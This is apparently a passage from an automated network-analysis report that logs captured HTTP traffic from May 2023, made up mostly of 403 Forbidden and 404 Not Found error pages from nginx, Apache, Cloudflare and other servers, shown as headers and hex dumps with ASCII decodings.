2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:51:43 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:43 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=IIXSj7r3xWV%2Fcg2JxrVLDq6%2FZRPNNZvVOT%2B557S%2F%2FlsGX%2B8Lbv70AU51jTrwV3KmkhQHZ78OyZ27OyQm9F1zxISv0XGbS6jxm7v83QdSY8NkRLl7hl3jVazraSTJq5I%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff59964f4e18e6-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:43 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=3AY0JxeJ%2FiTZo4z4AOZSJKTo8CVRSztCJt%2FgdZQWRZX2pmZf8upb6JB4zWeq%2FTcoynRXYTk34V7a38dSgORmmOYzCpkwIu6QtJai82EGuPyZ2QRJDsstaRgOQxdJbTE%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff59967f9518e6-FRAalt-svc: h3=":443"; ma=86400Data Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:51:43 GMTContent-Type: text/htmlContent-Length: 2843Connection: keep-aliveVary: Accept-EncodingLast-Modified: Thu, 26 Jul 2018 17:13:08 GMTETag: "b1b-571ea1be9f445"Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 45 55 43 2d 4a 50 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 58 53 45 52 56 45 52 20 49 6e 63 2e 22 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 49 4e 44 45 58 2c 46 4f 4c 4c 4f 57 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 2a 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 69 6d 67 20 7b 0a 20 20 20 20 62 6f 72 64 65 72 3a 20 30 3b 0a 7d 0a 75 6c 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 65 6d 3b 0a 7d 0a 68 74 6d 6c 20 7b 0a 20 20 20 20 6f 76 65 72 66 6c 6f 77 2d 79 3a 20 73 63 72 6f 6c 6c 3b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 33 62 37 39 62 37 3b 0a 7d 0a 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 a5 e1 a5 a4 a5 ea a5 aa 22 2c 20 4d 65 69 72 79 6f 2c 20 22 a3 cd a3 d3 20 a3 d0 a5 b4 a5 b7 a5 c3 a5 af 22 2c 20 22 4d 53 20 50 47 6f 74 68 69 63 22 2c 20 22 a5 d2 a5 e9 a5 ae a5 ce b3 d1 a5 b4 20 50 72 6f 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 2e 34 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 37 35 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 77 68 69 74 65 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 34 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 7d 0a 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 31 3b 0a 20 20 20 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 7d 0a 68 32 20 7b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 Forbiddendate: Wed, 31 May 2023 12:51:44 GMTcontent-type: text/html; charset=iso-8859-1content-length: 199server: Apachex-iplb-request-id: 66818F2B:D92B_D5BA2110:0050_647742E0_A668:2A89Fx-iplb-instance: 28099Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:51:46 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:51:46 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:46 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:46 GMTServer: Apache/2.4.56 (Unix) OpenSSL/1.0.2k-fipsContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:46 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=0AIOJdno%2F8%2FVkLzSnKzsahehmYwDLKBZDWCxxUsmL6ErhmH%2FfaX7pw4zYeRoCkyUwhIDiOkCun5C9wpXl%2BqF5YMU6vyczxNtgj4kFoT3ffdVCOQoNAyD1CPIPGqCT61B"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff59a9f87a9186-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:46 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMeMFZ26VdsJbR9Jf1fRFJeq,qquldgcFrj2n046g4RNSVL5pznunIc8dqFlAvDKHESQ=X-Wix-Request-Id: 1685537506.878355543282216435X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:47 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=dVbyQ93u9ghHF5OxRgctYRpalYzlIHx5iFYcCKxpkp9HlZ9IrJRMuUOnKueCmdFXdDZzz9P5Fah3T4Na3qFsRnQNvTEMMflFwflItnbm5A%2FsRtONjIoiPcU1OnQ%2FABCM"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff59ae99019186-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:51:47 GMTContent-Type: text/html; charset=UTF-8Server: ghsContent-Length: 1561X-XSS-Protection: 0X-Frame-Options: SAMEORIGINData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 